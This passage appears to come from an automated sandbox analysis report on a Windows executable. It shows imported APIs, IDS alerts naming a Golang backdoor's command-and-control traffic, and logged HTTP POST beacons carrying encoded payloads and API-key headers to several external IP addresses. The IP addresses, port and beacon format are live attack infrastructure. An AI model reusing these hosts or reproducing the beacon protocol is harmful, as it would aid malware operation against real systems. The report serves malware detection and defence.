DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                              advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                              comctl32.dllInitCommonControls
                              kernel32.dllSleep
                              oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                              comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                              shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                              shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                              comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                              ole32.dllCoDisconnectObject
                              advapi32.dllAdjustTokenPrivileges
                              oleaut32.dllSysFreeString

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-06T17:18:58.773033+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849709TCP
                              2024-11-06T17:19:22.896584+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21185.121.233.15225139192.168.2.849718TCP
                              2024-11-06T17:19:22.896893+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.849718185.121.233.15225139TCP
                              2024-11-06T17:19:37.328755+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849719TCP
                              2024-11-06T17:19:52.178566+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.849718185.121.233.15225139TCP
                              2024-11-06T17:19:52.412438+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11185.121.233.15225139192.168.2.849718TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 6, 2024 17:18:43.027559042 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:18:43.032548904 CET804970446.8.232.106192.168.2.8
                              Nov 6, 2024 17:18:43.032680988 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:18:43.033643961 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:18:43.038661003 CET804970446.8.232.106192.168.2.8
                              Nov 6, 2024 17:18:43.878026009 CET804970446.8.232.106192.168.2.8
                              Nov 6, 2024 17:18:43.933614016 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:18:43.983134031 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:43.988116980 CET804970546.8.236.61192.168.2.8
                              Nov 6, 2024 17:18:43.988230944 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:43.996113062 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:44.001965046 CET804970546.8.236.61192.168.2.8
                              Nov 6, 2024 17:18:44.880003929 CET804970546.8.236.61192.168.2.8
                              Nov 6, 2024 17:18:44.918684006 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:44.923728943 CET804970693.185.159.253192.168.2.8
                              Nov 6, 2024 17:18:44.924094915 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:44.924094915 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:44.929060936 CET804970693.185.159.253192.168.2.8
                              Nov 6, 2024 17:18:44.940129042 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:45.792134047 CET804970693.185.159.253192.168.2.8
                              Nov 6, 2024 17:18:45.815233946 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:45.820086956 CET804970791.212.166.91192.168.2.8
                              Nov 6, 2024 17:18:45.820153952 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:45.820377111 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:45.826106071 CET804970791.212.166.91192.168.2.8
                              Nov 6, 2024 17:18:45.836409092 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:46.723715067 CET804970791.212.166.91192.168.2.8
                              Nov 6, 2024 17:18:46.744668961 CET4970880192.168.2.8188.130.206.243
                              Nov 6, 2024 17:18:46.749959946 CET8049708188.130.206.243192.168.2.8
                              Nov 6, 2024 17:18:46.750049114 CET4970880192.168.2.8188.130.206.243
                              Nov 6, 2024 17:18:46.753221989 CET4970880192.168.2.8188.130.206.243
                              Nov 6, 2024 17:18:46.758095980 CET8049708188.130.206.243192.168.2.8
                              Nov 6, 2024 17:18:46.768897057 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:47.967667103 CET8049708188.130.206.243192.168.2.8
                              Nov 6, 2024 17:18:47.968067884 CET4970880192.168.2.8188.130.206.243
                              Nov 6, 2024 17:18:47.968075991 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:47.968076944 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:47.968080997 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:47.972691059 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:18:47.974483013 CET804970693.185.159.253192.168.2.8
                              Nov 6, 2024 17:18:47.974500895 CET804970791.212.166.91192.168.2.8
                              Nov 6, 2024 17:18:47.974515915 CET8049708188.130.206.243192.168.2.8
                              Nov 6, 2024 17:18:47.974560022 CET804970546.8.236.61192.168.2.8
                              Nov 6, 2024 17:18:47.974597931 CET4970680192.168.2.893.185.159.253
                              Nov 6, 2024 17:18:47.974606037 CET4970780192.168.2.891.212.166.91
                              Nov 6, 2024 17:18:47.974632978 CET4970880192.168.2.8188.130.206.243
                              Nov 6, 2024 17:18:47.974661112 CET4970580192.168.2.846.8.236.61
                              Nov 6, 2024 17:18:47.978332043 CET804970446.8.232.106192.168.2.8
                              Nov 6, 2024 17:18:47.978429079 CET4970480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:18.031707048 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:18.036750078 CET804971446.8.232.106192.168.2.8
                              Nov 6, 2024 17:19:18.036890984 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:18.042007923 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:18.047255039 CET804971446.8.232.106192.168.2.8
                              Nov 6, 2024 17:19:18.992965937 CET804971446.8.232.106192.168.2.8
                              Nov 6, 2024 17:19:19.016408920 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:19.021394014 CET804971546.8.236.61192.168.2.8
                              Nov 6, 2024 17:19:19.021543026 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:19.021840096 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:19.026906967 CET804971546.8.236.61192.168.2.8
                              Nov 6, 2024 17:19:19.037812948 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:19.890888929 CET804971546.8.236.61192.168.2.8
                              Nov 6, 2024 17:19:19.916244030 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:19.921613932 CET804971693.185.159.253192.168.2.8
                              Nov 6, 2024 17:19:19.921799898 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:19.922182083 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:19.927182913 CET804971693.185.159.253192.168.2.8
                              Nov 6, 2024 17:19:19.938148975 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:20.829529047 CET804971693.185.159.253192.168.2.8
                              Nov 6, 2024 17:19:20.868208885 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:19:20.873178005 CET804971791.212.166.91192.168.2.8
                              Nov 6, 2024 17:19:20.873308897 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:19:20.873711109 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:19:20.878752947 CET804971791.212.166.91192.168.2.8
                              Nov 6, 2024 17:19:20.889595032 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:22.175688028 CET804971791.212.166.91192.168.2.8
                              Nov 6, 2024 17:19:22.180007935 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:22.180099964 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:22.180128098 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:22.180381060 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:22.188976049 CET804971693.185.159.253192.168.2.8
                              Nov 6, 2024 17:19:22.188992023 CET804971546.8.236.61192.168.2.8
                              Nov 6, 2024 17:19:22.189002991 CET804971446.8.232.106192.168.2.8
                              Nov 6, 2024 17:19:22.189013958 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:22.189028025 CET4971680192.168.2.893.185.159.253
                              Nov 6, 2024 17:19:22.189064980 CET4971580192.168.2.846.8.236.61
                              Nov 6, 2024 17:19:22.189091921 CET4971480192.168.2.846.8.232.106
                              Nov 6, 2024 17:19:22.189121962 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:22.221319914 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:19:22.896584034 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:22.896893024 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:22.901871920 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:37.913849115 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:37.918845892 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:42.896240950 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:42.896509886 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:42.901350021 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:52.178417921 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:19:52.178565979 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:19:52.183341026 CET804971791.212.166.91192.168.2.8
                              Nov 6, 2024 17:19:52.183396101 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:52.412437916 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:19:52.460222006 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:03.131012917 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:03.131298065 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:03.137011051 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:18.147659063 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:18.152623892 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:22.194598913 CET4971780192.168.2.891.212.166.91
                              Nov 6, 2024 17:20:22.199640036 CET804971791.212.166.91192.168.2.8
                              Nov 6, 2024 17:20:22.413486958 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:22.418364048 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:22.647130013 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:22.694717884 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:23.382080078 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:23.382551908 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:23.387397051 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:38.399590015 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:38.404567003 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:43.617119074 CET2513949718185.121.233.152192.168.2.8
                              Nov 6, 2024 17:20:43.617333889 CET4971825139192.168.2.8185.121.233.152
                              Nov 6, 2024 17:20:43.622129917 CET2513949718185.121.233.152192.168.2.8

                              HTTP Request Dependency Graph

                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.84970446.8.232.106801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:18:43.033643961 CET334OUTPOST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: roePuyRb
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:18:43.878026009 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:43 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.84970546.8.236.61801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:18:43.996113062 CET333OUTPOST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: aZJvaNJM
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:18:44.880003929 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:44 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.84970693.185.159.253801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:18:44.924094915 CET336OUTPOST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: jQyaDn9L
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:18:45.792134047 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:45 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.84970791.212.166.91801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:18:45.820377111 CET335OUTPOST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: EAalWPI3
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:18:46.723715067 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:46 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.849708188.130.206.243801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:18:46.753221989 CET337OUTPOST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: nfnVo8vT
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:18:47.967667103 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:18:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.84971446.8.232.106801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:19:18.042007923 CET334OUTPOST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: mIQ60NDK
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:19:18.992965937 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:18 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination Port
                              6192.168.2.84971546.8.236.6180
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:19:19.021840096 CET333OUTPOST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: AYMhFAHY
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:19:19.890888929 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:19 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.84971693.185.159.253801984C:\Users\user\Desktop\m0Yc9KltGw.exe
                              TimestampBytes transferredDirectionData
                              Nov 6, 2024 17:19:19.922182083 CET336OUTPOST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: alJ3chjw
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a
                              Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
                              Nov 6, 2024 17:19:20.829529047 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Wed, 06 Nov 2024 16:19:20 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
